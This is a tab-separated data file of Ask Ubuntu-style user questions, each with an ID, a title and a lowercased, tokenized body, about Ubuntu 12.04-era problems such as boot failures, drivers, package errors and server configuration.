196135	`` bootmgr is missing ... . '' upon reboot	ill take you through the steps i did . sorry if this question has already been resolved , i 'm new to ubuntu and forums in general . i have 2 internal hdds in my computer , both with win7 . one hdd is my mothers , the other is mine . i did this because she did n't want my games on her computer , and my pcs motherboard took a crap on me , so i set up a dual boot . i also have an external hdd . this is what i am trying to install ubuntu 12.04 on . i formatted the drive by right clicking it , then selecting `` format '' . it is now in ntsf format . i downloaded the windows installer , ran it , and selected `` i : / '' ( my externl hdd ) as the install location . the download and installation ran smoothly , and it gave me the reboot prompt . i selected `` reboot now '' and my pc rebooted . i was then interrupted by the `` bootmgr is missing . press ctrl + alt + del to reboot '' message . note : i would like to use my hdd for a full ubuntu installation , not the live ( i think thats what its called ) . i want all my files and settings from ubuntu saved to the external drive as if it was my only drive . if you need more information just ask . any help would be appreciated . thanks in advance .
196136	what is a good mongodb gui client ?	i 've been using rockmongo on windows - it 's a php based web tool . but on ubuntu ( 12.04 ) it 's behaving funny - queries timing out often - and i 'm looking for better clients . does anyone know anything good for mongodb on ubuntu ?
196141	crontab kill firefox processes	i want to make a crontab job for killing any firefox processes running , if there is more than a max number of processes running , starting with the oldest process . so let 's say 5 processes is running and i only wa n't to allow a maximum of 2 , then kill the 3 oldest automatically .
196144	how can i restore the default /etc/apache2 and default apache2 files ?	my /etc/apache2 folder has been deleted , is there a way to restore the defaults of all files for apache2 ? i 've tried sudo apt-get remove -- purge apache2 sudo apt-get install -- reinstall apache2 any way to do this ? thanks !
196147	torchligh not updating	so i bought the humble indie bundle vi containing torchlight ( among others ) and installed them via the software centre . a few days later some updates were available in the update manager as in this picture . unfortunately , when trying to install it , the following message appears : which reads as follows : ( reading database ... 425427 files and directories currently installed . ) preparing to replace torchlight 1.0+2012+09+18a-0ubuntu1 ( using ... /torchlight_1.0+2012+09+26-0ubuntu1_i386.deb ) ... unpacking replacement torchlight ... dpkg : error processing /var/cache/apt/archives/torchlight_1.0+2012+09+26-0ubuntu1_i386.deb ( -- unpack ) : trying to overwrite '/opt/torchlight/torchlight.png ' , which is also in package torchlight-bin 1.0+2012+09+18a-0ubuntu1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/torchlight_1.0+2012+09+26-0ubuntu1_i386.deb could anyone help me fix this ?
196158	why do you have to press alt+` twice to switch windows within an application ?	alt+` switches windows within a running application . but i notice that you actually have to press this key combo twice to switch to the next window . pressing it once only displays the application 's open windows ( within the current workspace ) . why is this ? why is n't a single alt+` sufficient to switch windows ? after all , alt+tab behaves in the expected way when you want to switch between applications . i 'm running ubuntu 12.04 .
196159	formating text in empathy chat	i love the look of empathy so much more than pidgin and would really like to use it as my main chat client but i ca n't seem to find a way to format text . it does not appear to be a feature of the program even though i would assume that being able to bold or italicize words would be a basic need in chat . is there a way to do this that i 've missed ? or perhaps another program would better suit my needs ( not pidgin unless i can completely overhaul the chat window , that is way too much of a 90s flashback for me ) ?
196167	installing netcdf c++ interface on 12.04.1	i am using a code which employs the modern netcdf c++ interface ( netcdf namespace , include file is called just netcdf without .h or similar , ncfile class , etc ) and have just switched to 12.04.1 . i installed netcdf and libnetcdf6 with apt-get , but i still get the `` old '' headers in /usr/local/include ( netcdf.h , netcdfcpp.h , etc ) . in ubuntu , the library version for netcdf is 4.1.1 , while at my own computer with mac os x ( where i have the right netcdf include file ) the version is 4.2.1.1 . i can not modify the source code i am using . i would like to know if there is a way to upgrade the netcdf library on ubuntu to support the modern c++ interface , or , if i have to manually compile it , if you think that using src2pkg is a good idea . this is my first experience with ubuntu .
196168	usb ports not working on xubuntu 12.04 lts	basically , my usb ports on my ibm thinkpad t43 have stopped working most of the time . sometimes , they mount and appear in nautilus , but other times , they are n't recognized . the timeline of events on this laptop for the past few months : started having problems after using a usb port hub . the port would sometimes work but would be fixed with the occasional reboot . re-partitioned/expanded my xubuntu partition ( i have a windows xp/xubuntu dual boot ) . now the majority of the time , the usb fails to recognize devices . in addition , the few times they are recognized , the device may suddenly disconnect . things i 've noticed : the devices still receive power from my computer ( i can charge my ipod..etc.. ) i ca n't understand dmesg outputs . i do n't know if lsusb is telling me anything useful . my dmesg output is here : http : //pastebin.com/kdnxhcfc things start to get weird at the bottom of the file . and my lsusb is : $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
196177	is it possible to make nautilus open with two panes by default ?	other than usign xdotool to send f3 to nautilus when it starts . ( which is a solution.. ) i 'm wondering if anything new as been included in the nautilus codebase that enable it in preferences to open up dual paned by default . i really liked total commander when using windows.. and other than to running it in wine , i have n't found any other more linux native way to manage more intuitively files and folders . ( in a gui context ) having two panes open up that remember where i was prior to closing nautilus would be awesome if someone knows how enable it..
196178	how ready is zentyal to replace windows server as an smb server ?	by `` smb , '' i mean small-to-medium business , not samba . i 'm playing with zentyal , but i do n't have the resources to do a full-on test of the system . has anyone moved to this at work ? how has it helped / hurt ? see the packages in the ubuntu 12.04 universe .
196179	how i can restart all the programs configuration ?	i want to know if there is any way to reset all the settings of the programs what i 've installed . for example , restart the configuration of gparted or rhythmbox .
196180	not booting from usb or cd ( syslinux message )	i am trying to install linux on my laptop , a toshiba satellite c6550-s5200 . i did it once but something happened so i removed it then i had to destroy all data on hard drive so now i have nothing on it . well i got a iso file burned to a cd and to a flash drive . with the flash drive i get . syslinux 4.06 edd 4.06-pre7 copyright ( c ) 1994-2012 h. peter anvin et al with the cd it will start booting it but somewhere loading it up , the dots turn all orange and stay that way and my cd drive turns quiet . oh and some more info the images work because i tried loading them up on another pc and it worked just fine . i manage to get the cd to boot i just had to let me pc boot up first then insert the cd and have it boot the cd then . once i get done installing ubuntu it works fine but i have to leave the pc on 24/7 for if i turn it off the pc will freeze 5-10 seconds after booting back up no matter how i install it .
196181	globalmenu does n't work after installing gnome-shell	menu in unity is n't looked like usual after installing gnome-shell . i have unitnstalled gnome-shell but it does n't back . what should i do ? . it 's so ugly .
196192	grub will not install with boot-repair or by any other means	i am currently trying to get grub back . i have tried everything from reinstalling , to boot-repair , and even super boot manager . nothing seems to work . i have created a log with boot-repair here . any ideas ?
196193	ca n't connect to internet	i am able to connect to my home network , but firefox and chrome will not connect to the internet . how can i fix this ? i am using a wireless laptop . i have troubleshooted that my network is working , and i am currently using my home network with a windows laptop i borrowed from work . both browsers worked previously from home and the public network at the library . i am very new to linux .
196196	why my system gets frozen ?	is now something like 2 weeks since my system gets frozen while browsing the web , using apps , watching videos on web sites , basically using any part of my netbook , even when i 'm only using one program ( like the web browser ) this happens . is so frozen , that the only option i have left to do is to press and hold the power button , nothing else works ; i have seeing an error message telling me about a `` compiz '' error , but not all the times , and this happens every day , some times 2 or 3 times , during the same day . why does this happens ? how can i fix it ? please help . just to let you know i have my system up to date on 12.04 32 bits version , working on an acer aspire aod257 , 1 gb ram , intel® atom™ cpu n570 @ 1.66ghz × 4 .
196198	audio output to input	the audio output port on my laptop just broke and i can no longer use it for my headphones . does anyone know of a way i can route the sound output through the input instead ?
196201	why does ubuntu 's boot become slower with the passing of time ?	i 'm 3 years into using ubuntu as my default os , but i notice that ubuntu is becoming slower after some weeks of installation . on all the ubuntu versions i have used including `` ubuntu 10.10 , 11.04 , 11.10 and 12.04 '' , the boot becomes slower . when i make a fresh install , it boots in just 17 seconds ... after 2 mouths , the system takes almost 1 minute to boot ( slower than win7 ) . i tried to disable all the software that starts with the system , but the problem continues ( i had this problem with my older notebook , so it 's not hardware related ) . ubuntu 's boot looks inconsistent too , because sometimes i see the purple boot screen , sometimes i just can see an underline at the left-top side of screen . so . why is ubuntu 's boot going slower with time ? can it be fixed ?
196202	if i upgrade my ubuntu to non-beta version , will my installed software lost ?	my software lost when i upgrade to ubuntu to 12.10 beta version . will my software lost if i upgrade to non-beta version ?
196203	error 404 in ubuntu	how is fix this problem ? w : failed to fetch http : //archive.canonical.com/dists/ [ distro ] /partner/source/sources 404 not found w : failed to fetch http : //archive.canonical.com/dists/ [ distro ] /partner/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
196204	home folder in `root` and not in `home` ... i 'm confused !	i have an issue with my home folder and this are giving me some permission problems . i 've installed an application that tells me that i have no permission to save in /home/username/desktop , but in fact my home is in /home/username/área de trabalho ( área de trabalho = desktop , but in portuguese ) . accessing as sudo my home is shown in the below image ( look at the folder icon ) . ( inside is the desktop folder . ) accessing as regular user my home is shown in the below image . ( inside is the área de trabalho folder . ) is this normal ? should i tell ubuntu where my actual home folder is ? what i have to do ? thanx in advance !
196205	can i torrent a dvd and still try ubuntu	i torrented the 64bit edition for my pc but the only option at boot was install ubuntu . i am now torrenting the 32 bit hoping it has try ubuntu option . help ?
196207	how to create a simple hosting server ?	in our university we want to create simple web hosting for our students . our web hosting is supposed to provide following features : every student has it 's own folder where he can upload his website one web site per user each student has a limit of 100mb of disk space in the server server supports php+mysql students can access their folder via ftp and only have access to their own folder could you please propose any free application ( s ) which could help us in order to organize this kind of web hosting in our ubuntu server ? thank you !
196212	how do you open a command line ?	i want to set up trim for my ocz vertex 4 ssd , but i have no idea how to do this even after reading the instructions . how do you even access the command line or run option to put the commands into the system ?
196215	ubuntu display issues	i installed 12.04 about 3 days ago . i was not very happy with the results , when i start , it takes a lot of time . i have also display problems . for example , the movement of windows , the selection box , the movement of mouse pointer . my colleague who recommended me to install ubuntu told me that it requires many fewer requirements than windows ( xp in my case ) . but anyway , when i installed ubuntu , i installed it with the first option of the installer . i think that option says , `` install ubuntu , but keep windows '' or something , and asked me to allocate an amount of storage on my hard drive for each os . i allocated 247 gb for windows and 80 gb for ubuntu . i want to know if i can uninstall ubuntu , and get back the storage allocated to it , return to windows , along with those 80 gb , or just help me with these display issues . i hope you understand me , i need help fast .
196230	how do i install graphviz 2.29 in 12.04 ?	in my ubuntu 12.04 , the graphviz is not the latest version ( 2.29 ) . i need some features available in the latest version of graphviz . i tried to install the graphviz version 2.29 , which requires libgraphviz4 ( > =2.18 ) . i anyhow installed libgraphviz4 and installed graphviz 2.29 . for that i have to remove packages libcdt4 and libpathplan4 . now whenever i try to generate graph , i get some problems : for e.g . : dot -kfdp -n -tpng -o samplepos.png forcepos.dot it says : dot : error while loading shared libraries : libgvc.so.6 : can not open shared object file : no such file or directory neato -tps -o sample_1.ps sourcedot.gv it says : neato : error while loading shared libraries : libgvc.so.6 : can not open shared object file : no such file or directory so , i am looking for some ways so that i can run graphviz 2.29 in my ubuntu 12.04 .
196233	how to recover data from old encrypted hard drive ?	i am trying to work out how to recover the data from the hard drive that was in my old laptop . it was running the latest ubuntu and i am now running ubuntu satanic 11.04 as i do not like 11.10 . uhe drive was encrypted and i have it now in an external usb drive enclosure . i have tried chown and advanced chown and still it is not showing me the contents of the home folder . i am starting to be at a loss what to do as there is quite a large amount of data on there that is pretty important to me . the old os is pretty irrelevant and i will be using the drive for a backup once i can get the data recovered . it was the graphics that died on the old laptop .
196246	failed grub after 10.04 to 12.04 upgrade in system with lvm	i am using ubuntu server as a smb server at work and two days ago i have tried to upgrade it to 12.04 . after reboot , i got this grub_xput missing grub rescue > and all attempts to start from this prompt failed ( missing components , although grub directory is normally set as prefix ) . my system sits and boots on an lvm ( soft raid-5 ) . i have read almost all posts in many forums , tried grub rescue , boot-repair , ubuntu-secure-remix with boot-repair but without positive result . this is the log of my last ( and best so far ) attempt to fix this system . any suggestions ? please help .
196248	is there a way to do a fresh install of just ubuntu and wipe the hard drive completely ?	i have an older hp laptop that came with vista . instead of installing win8 , i installed ubuntu as an application where it prompts for windows or ubuntu during the boot process . well , windows has not been booting for a year ... i think it was crushed by a virus . i 'm happily using ubuntu but i 'm wondering if there 's a way to do a fresh install of just ubuntu and wipe the hard drive completely with this unique setup where ubuntu is attached to windows but i ca n't get into windows ?
196250	dell inspiron n5110 touchpad not detected	sanju @ sanju-inspiron-n5110 : ~ $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=13 [ slave keyboard ( 3 ) ] as above my touchpad is not detected by the system . version is ubuntu 12.04 can anyone help me ?
196261	recommend ubuntu compatible notebook	i use ubuntu 12.04 on my desktop , but right now i want to buy a laptop where i wish to run ubuntu 12.04 . which brand ( such as acer , dell , asus , fujitsu etc . ) will be best for running ubuntu ? my budget prefer below configuration . processor : 2nd gen intel® core™ i5-2450m , 2.5 ghz ram : 2gb ddr3 graphics : 128mb integrated or nvidia® geforce® gt 630m with 1gb of dedicated ddr3 vram hdd : 500gb screen : 15.6” led i need a perfect laptop which driver supported by ubuntu .
196267	nouveau failing to drive dual monitors on kernel 3.2.0-30	i have set up my system quite a while ago and even though nouveau has some quirks , i still prefer to use it to the nvidia drivers , because or randr . after the latest kernel upgrades to version 3.2.0-30 and -31 , it is unable to use dual head setup , or any external monitor for that matter . when i boot back into 3.2.0-29 everything is working fine . how to make the later kernels work with nouveau again ?
196268	migrate from thunderbird to mutt	i am contemplating moving from thunderbird to mutt ( provided it is feasible ) to move to a faster , simpler application . my current thunderbird set-up consists of multiple imap accounts ( gmail and google apps ) . only selected folders ( read labels ) in each imap account are stored locally . for all other folders , i glance through the headers and open a message only if i find it interesting . i also use folder bookmarks to navigate to folders quickly . i also move messages across folders with keyboard shortcuts . is it possible to replicate the set-up in mutt ? can someone share/ point to a sample muttrc file that does the same thing ? it would be great if the muttrc file is adequately commented . on a side note , will it also be possible to import my messages from thunderbird locally ? that will save me considerable network traffic ( about 2gb data stored locally ) .
196269	how to show just one drive in unity bar	i have two partitions and both are appearing in nautilus . on one partition windows is stored and other is for general use d : \drive . in unity we have option to display mounted drives but i want only one drive to appear that is d : \ drive . can this be done ? ? ? ?
196271	how to use wget to download a file which can be downloaded by firefox ' default downloader ?	i try to use wget to download this but failed . https : //code.ros.org/trac/wg-ros-pkg/raw-attachment/ticket/5069/rein_cmakelists2.patch sam @ sam : /media/data/code/ros/recognition/rein $ wget https : //code.ros.org/trac/wg-ros-pkg/raw-attachment/ticket/5069/rein_cmakelists2.patch -- 2012-10-04 16:29:30 -- https : //code.ros.org/trac/wg-ros-pkg/raw-attachment/ticket/5069/rein_cmakelists2.patch resolving code.ros.org ( code.ros.org ) ... 157.22.19.21 connecting to code.ros.org ( code.ros.org ) |157.22.19.21|:443 ... connected . http request sent , awaiting response ... read error ( connection reset by peer ) in headers . retrying . -- 2012-10-04 16:29:32 -- ( try : 2 ) https : //code.ros.org/trac/wg-ros-pkg/raw-attachment/ticket/5069/rein_cmakelists2.patch sam @ sam : /media/data/code/ros/recognition/rein $ but i can use firefox to download . how to download this kind of file in wget ? thank you~
196272	how to install and configure swat in ubuntu server 12.04	how to install swat ( samba web administration tool ) in 12.04
196277	can i map a key ( caps lock ) so it does one thing pressed alone , and another when pressed with a second key ?	just read this seriously obsessive post about customising keyboards and while i 'm not going to do everything there , there are a couple of ideas i 'd like to nick . in particular he has set up the caps lock key so that : when pressed and released alone , it is mapped to esc when pressed and held , and a second key is pressed , it is mapped to ctrl as he says , this is great for vim users . is that possible in ubuntu ? he also does something similar with the right and left shift keys . when pressed alone they map to ( and ) but if another key is pressed they act as you expect shift to work .
196278	thunderbird 16 and lightning	i have just upgraded from thunderbird 15 to 16 and then found that lightning 1.7 is not compatible with thunderbird 16 , leaving me without a calendar . what are my options ? should i try and go back to thunderbird 15 or is there someway of finding a version of lightning that is compatible with thunderbird 16 ? i need to have a working calender and have been happily using lightning for many years . i am using ubuntu 12.04 ( precise ) 32-bit if that is any help
196282	ubuntu 12.04 wifi/brightness fn keys do n't work	i have scoured the internet trying to find a solution to my problem . i have a toshiba l755d-s5171 and like many people the fn key works to a very small extent . the fn+3/4 works to vol-down/up and fn+esc works to mute like many have reported . i have looked for that `` bios option '' some users speak of , and there is n't one for my model . i have installed fnfxd and fnfx and all that jazz but no cigar . like one user i noticed recently my fn+f6/f7 keys `` work '' after a suspend ( they show brightness bar and it changes , but no real change to brightness ) and i can softblock my wifi , all after a suspension , but they still do not actually work as designed . i do n't know if there is an answer out there , but if there is i would like to be told or pointed to it . i really like ubuntu and would like to use it on a regular basis for everything but gaming , but if i can not change power consumption options on the fly then windows will work better for me . i see alot of posts/threads asking for help , and only a few replies that work for a few people . all i really need to work is the wifi , i do a lot of stuff online , and a lot of stuff offline , and if i am traveling i do n't want to have to restart my computer to turn off wifi in the bios . toshiba l755d-s5171 650gb hdd = 70gb ubuntu 12.04 amd64 , 580gb windows 7 home premium x64 amd llano a6 3420 1.5ghz quad core 4gb 1333 ddr3 204pin ram
196287	strange grub behavior on samsung laptop	i have got a samsung series 9 900x3c with ubuntu 12.04 on it . after installing ubuntu grub would not load completely ( only parts of the menu were showing ) every time so i launched the boot repair indicating the use of an uefi bios . now grub always loads completely but i do not seem to be able to launch ubuntu directly . instead i have to select advanced options for ubuntu and the newest kernel version and then the boot starts . any ideas ? thanks a lot in advance johannes
196288	pcman filemanager displays old data on usb mounted drive	when i plug in usb flash drive , or even my camera and open file manager only old data that was previously on usb drive ( or camera 's memory card ) is shown . i ca n't open any of those files or see any new listed . is there any way to clear usb cache , some temp files or something where that data is stored . i am using lubuntu 12.04 .
196289	creating alias and script alias in apache	i am configuring lg looking glass on ubuntu . i have followed this link . in step 3 they said to add following two lines to webserver config : alias /lg/favicon.ico /usr/local/httpd/htdocs/lg/favicon.ico scriptalias /lg /usr/local/httpd/htdocs/lg/lg.cgi i have added it to my webserver config : # vi /etc/apache2/sites-available/default alias /lg/favicon.ico `` /usr/local/httpd/htdocs/lg/favicon.ico '' < directory `` /usr/local/httpd/htdocs/lg/favicon.ico '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > scriptalias /lg/ `` /usr/local/httpd/htdocs/lg/lg.cgi '' < directory `` /usr/local/httpd/htdocs/lg/lg.cgi '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > when i tried http : //127.0.0.1/lg in my browser , it shows not found . i am new with web-server , can anyone help me please ?
196290	name a byobu session ?	is there a way to create identifiable byobu sessions so that when i 've got multiple sessions running , the byobu-select-session menu gives me a list of sessions i can recognize , as opposed to non-descript tmux port numbers ? in an ideal world , it would be great to be able to both start a session giving it a name and to modify such a session to change a name if it 's already running ? is this possible , how ? edit 1 : some further details : i 'm using tmux as the backend and do n't especially want to switch back to screen . i 've now tried starting a session with byobu -s `` name '' to no avail : - ( edit 2 : some discoveries : i 've now discovered a partial answer in using tmux native commands : tmux rename-session < current-name > < new-name > renames an existing session and tmux new -s session_name creates a new names session . i 'm surprised byobu -s `` name '' is n't liked to tmux new -s session_name for byobu with a tmux backend .
196293	applications to make photo collages	is there a good application where i can make collages using my photo collection on ubuntu 12.04 ? i saw this link , but could n't find any of them in my ubuntu software centre or the instructions to add the ppa to get them .
196294	is it possible to save ssh password in remmina ?	i have remmina 0.9.99.1 ( 1.0.0 ) in ubuntu precise 12.04 can i save the ssh password so that it wo n't prompt me again for it
196298	how to fetch the website code in my local machine ?	i have a local git repository in my system by name 'git_repo ' under which i had the whole codebase for a website ( pre-configured by someone else ) , including all the jsps , js , css etc . i used the following commands to create the local git repository out of the main repository : git branch //to show the current branch git checkout -b branch_local_name origin/main_branch_name //to create local repository in current branch git fetch //to fetch the current build accidentally , i deleted all the contents of the local folder and i do n't know what to do fetch the contents of that website again .
196301	google earth stereoscopic 3d browsing	one of the things i like very much in google earth is flight simulator . it would be great if one could use a red-cyan glasses for 3d effect using stereoscopic ( anaglyph ) rendering . on windows there are a few solutions - is there something similar for ubuntu ?
196307	change dconf keys without logging into x in puppet	is there a way to set a dconf key by command line , without logging into x ? i 'd like to use this from puppet . if i try ( from ssh , as the normal user ) a simple dconf write /desktop/gnome/remote-access/enabled true i get error : command line `dbus-launch -- autolaunch=e4d2b270bd8471627460e57c000007f1 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n while if i try display=:0 dconf write /desktop/gnome/remote-access/enabled true i get error : command line `dbus-launch -- autolaunch=e4d2b270bd8471627460e57c000007f1 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : invalid mit-magic-cookie-1 keyinvalid mit-magic-cookie-1 keyautolaunch error : x11 initialization failed.\n if i remove $ home/.xauthority error : command line `dbus-launch -- autolaunch=e4d2b270bd8471627460e57c000007f1 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : no protocol specified\nno protocol specified\nautolaunch error : x11 initialization failed.\n i 'm testing on xubuntu 12.04 ( my question is similar to this one but in that case the user is logged in )
196312	ubuntu studio 12.04 wo n't boot	i 'll warn ye first off i 'm still relatively new to ubuntu and linux . i installed ubuntu studio on a spare hard-drive ( formatted beforehand etc. ) . install works fine ( off live usb ) but after the restart it gets as far as an unresponsive black screen with a white cursor flashing in the top left . ( does this mean grub can not load a kernal ? if so how do i fix ? ) when i boot of the live usb again it is as if i booted of the hard-drive , i.e . i need my profile password to access and the system and do n't have to mount the filesystem . i have vista dual booting with the normal ubuntu on another hard-drive and i get this black screen w/flashing cursor for a second just before i get to the grub screen that allows me to choose the os to use . any help would be much appreciated .
196318	configure isc dhcp server `` routers ''	my challenge is trying to find a conditional way to change the order of the default gateways used in `` option routers '' parameters . perhaps on receiving a dhcpdiscover message . so the first client requestiong a dhcp address will receive 10.1.1.1 10.1.1.2 as `` option routers '' and the next request will send 10.1.1.2 10.1.1.1 as `` option routers '' . basically inversing the order of the default gateways . i need this in order to achieve some load balancing and failover in the same time , using only dhcp server for this . i am currently looking at `` dhcp-eval '' options which seems like being a set of options geard towards such customizations but it is difficult to understand where to start . does anyone had to do something similar and if yes , could you share the code/setup that was used for scenario ? thank you !
196324	lives hangs during initial configuration	i 'd like to install the video editing software lives on my ubuntu 12.04 . the installation itself worked without any problems . when i now start lives it runs through the initial configuration until the dialog lives : -testing configuration appears , which shows 4 tests being executed ( all of them successfully , with a green check ) . problem is , the next-button is disabled , so i ca n't continue with the configuration . when trying to use the cancel-button , the application seems to hang and i have to kill the process . any help would be greatly appreaciated . while answering this question , please keep in mind , that i 'm relatively new to ubuntu .
196325	bash : how to make smarter auto-complete on tab press	using the git status command , i had : modified : conf/test.conf is it possible to configure bash in that way so when i type git diff *test.conf and press tab for auto-complete , it would expand it to full path . i.e : conf/test.conf ?
196328	how to use comix to open image folders together ?	i have an album containing many image folders . i want to watch them using comix directly , unfortunately i must open each folder one by one . how to open them together with comix ? . or , do you have any suggestion for an image viewer which can auto resize image and easy navigation also can open image folders together . ?
196333	how to play a sound when laptop gets unplugged ?	my laptop unplugged stands 1 minute . previous week my laptop cable , started not connecting good with the laptop . i would like to play a certain sound everytime it gets 's unplugged so i can hurry and connect them good.. anyone ?
196336	setting default permissions	i 've read a lot of solutions for something like this , but nothing seems to work quite right for me . i have a shared development box used for a few projects that require such a thing and i 'd like to configure it so that files created by users in the /opt/dev directory : are owned by < username > : developers have permissions set to 774 ( files ) have permissions set to 775 ( directories ) all developer users have their primary group set to developers so the first requirement has been pretty solid . what 's a lot less solid is the actual permissions . they just are n't being set consistently the way we need them to get set and i have n't found the right solution . i do have the sticky bit set ( g+s ) based on something else i read at some point , but that would n't seem to be particularly useful since all users are in the same primary group . i also have the default umask set to 002 in /etc/login.defs . i thought that would kind of cover it , that does n't seem to be the case . i 'd really appreciate any advice about how to get everything lined up properly . i feel like i 'm constantly in there adjusting a file here and a directory there just so people can do their work .
196339	what are the available browsers for 128 mb of ram pc ?	running 12.04 with virtualbox and i set it for 128mb of ram . i can not use more than 128mb of ram . since the browsers i know like firefox , google chrome and chromium seem to eat more ram , could somebody suggest me browsers which consumes low ram ?
196341	what is the difference between xterm and xterm ( unicode ) ?	i am using ubuntu 12.04 .while looking around terminal and i came across two things . one is xterm and xterm ( unicode ) , may i know what the difference between these two things ?
196348	wubi - wont run	when i try to load the wubi installer , it asks for permission , i click yes - then , nothing happens . i 've tried to reboot the computer , close every program . please help me !
196352	how to kill an app started by `quickly run`	i am building an app and it hangs on some thread . how can i kill that app ? tried ctrl+c but it did n't work ( the icon stays in the notification area ) thanks
196364	i have enabled hibernate but it is n't working . what can i do ?	i enabled hibernate in 12.04 following the procedure given in this question : how to enable hibernation in 12.04 ? but , even after i enabled it , the hibernate is n't working . by not working , i mean the computer is hibernating correctly , but it is not resuming . i always given the login screen and a fresh session . how can i enable hibernate that successfully resume ?
196369	black screen ubuntu 12.04	hey guys , i was using my ubuntu 12.04 and today i had a problem : i was running virtual box , photoshop and doing some updates , when ubuntu `` explorer '' went missing . the top and bottom bars disappeared too . the only thing that remained was the `` explorer '' window , i could n't press alt+tab to change programs , seemed like the `` explorer '' was frozen . i tryied rebooting the system manually , but when i turned it on again , after the classic purple screen with the dots , the screen went back , neither my keyboard nor my mouse work . already tryed ubuntu 12 livecd , boot-repair and recommended repais , but the problem persists . so , anyone can give me a hint of what happened or how can i fix this problem ?
196371	i shrank my font too small , how do i fix this ?	i was trying to find the perfect font size and shrank the font to zero . now all the fonts in apps and menus are so tiny the dont even show with zoom . how can i fix this ? ubuntu 12.04 gnome . i tried tabbing through advanced settings hitting ctrl & + and managed to change window fonts . too bad they are exactly where i want them .
196373	installing mesa-utils messes up video driver info	after i installed mesa-utils in order to get rid of the `` unknown driver '' message ( see here ) i got contradicting info about which driver is actually being used . `` system settings '' says : gallium 0.4 on llvmpipe ( llvm 0x300 ) , but if i type lsmod | grep video i find psb_gfx in the `` video '' row . any idea ? especially , if gallium is really being used , how to remove it and fall back to psb_gfx ? i 'm using an aspireone 751h with atom , so processing power is pretty scarce and i 'd prefer not to waste it to run a sw emulation of a gpu .
196374	`` do-release-upgrade -d '' does n't prompt for update	i am using ubuntu 12.04 server and i would like to place that pc for testing purposes so moving to 12.10 server but i am unable to do that . i am doing this in a vm , so i ca n't copy/paste the text report . i took a screenshot instead . i have done : sudo apt-get install update-manager-core sudo do-release-upgrade -d what am i doing wrong ?
196379	removing mdadm array and converting to regular disks while preserving data	i have a 6 disk ( 2tb each ) mdadm raid 5 volume created in ubuntu 12.04 server . however , i 'm moving to a different solution and want to `` unraid '' my disks but keep the data . only 50 % is in use . from what i can surmise i basically have to do this recursively for each physical disk . fail the disk format the failed disk move a portion of files to the new disk . reshape the array shrink the logical volume md0 this seems like a very time consuming process . is there an easier way to do this ( automatically perhaps ) without buying new disks to temporarily hold the data ? i am also aware that during this processing my raid volume will be degraded and vulnerable the entire time . i am not too concerned about this and will be using battery backup and moving the most important files off first . thank you for your help !
196380	package dependency problem preventing installing any program due to libvte9 dependency	that is the error i get whenever i try to install wine , chromium , flash player or any thing else any help would be appreciated ( a new ubuntu user ) the following packages have unmet dependencies : enigma : depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.2 is to be installed depends : libcurl3-gnutls ( > = 7.16.2-1 ) but 7.22.0-3ubuntu4 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : enigma-data ( = 1.10~~pre-alpha+r2210-1.1 ) but 1.10~~pre-alpha+r2210-1.1 is to be installed i am using ubuntu 12.04 lts 32 bit i have tried sudo apt-get install -f here is the result of this : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic-pae use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . any help you can give me ? `` edit '' when i tried to install synapetic packet manager from the terminal i got this error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : '' the following packages have unmet dependencies : synaptic : depends : libept1.4.12 but it is not installable depends : libvte9 ( > = 1:0.24.0 ) but it is not installable recommends : rarian-compat but it is not installable '' after that i tried the software center it gave me the same error as every other application any other ideas
196382	system in low-graphics mode	i am totally new to linux , and ubuntu . i bought asus x53e notebook , erased windows and installed ubuntu . first it worked ok. then when i started working with it , i opened the terminal , entered sudo chmod 666 usr and then all the icons from the main panel disappeared + the whole system stopped responding . i decided to restart the system . when restarted , a message appears : the system is running in low graphics mode and below it : your screen , graphics card and input device setting could not be detected correctly . you will need to configure it yourself . but the `` ok '' button is disabled and if i press any buttons nothing happens . if i enter ctrl-alt-f2 it opens the bash terminal . but there commands sudo or apt-get are not found and it says that permission denied if i try to enter any folder like cd /usr if i enter the su command it asks for the password i do n't know . when encountering this problem first , i reinstalled the whole ubuntu . but today it happened again just the same . what shall i do ? maybe there is something wrong with the hardware ? if i need to install another distribution of linux could you recommend one ? but i 'd rather stick to debian releases like ubuntu . so how do i fix the problem ? ps : please give answers in simple terms because am a newbie so i do n't know what goes where yet .
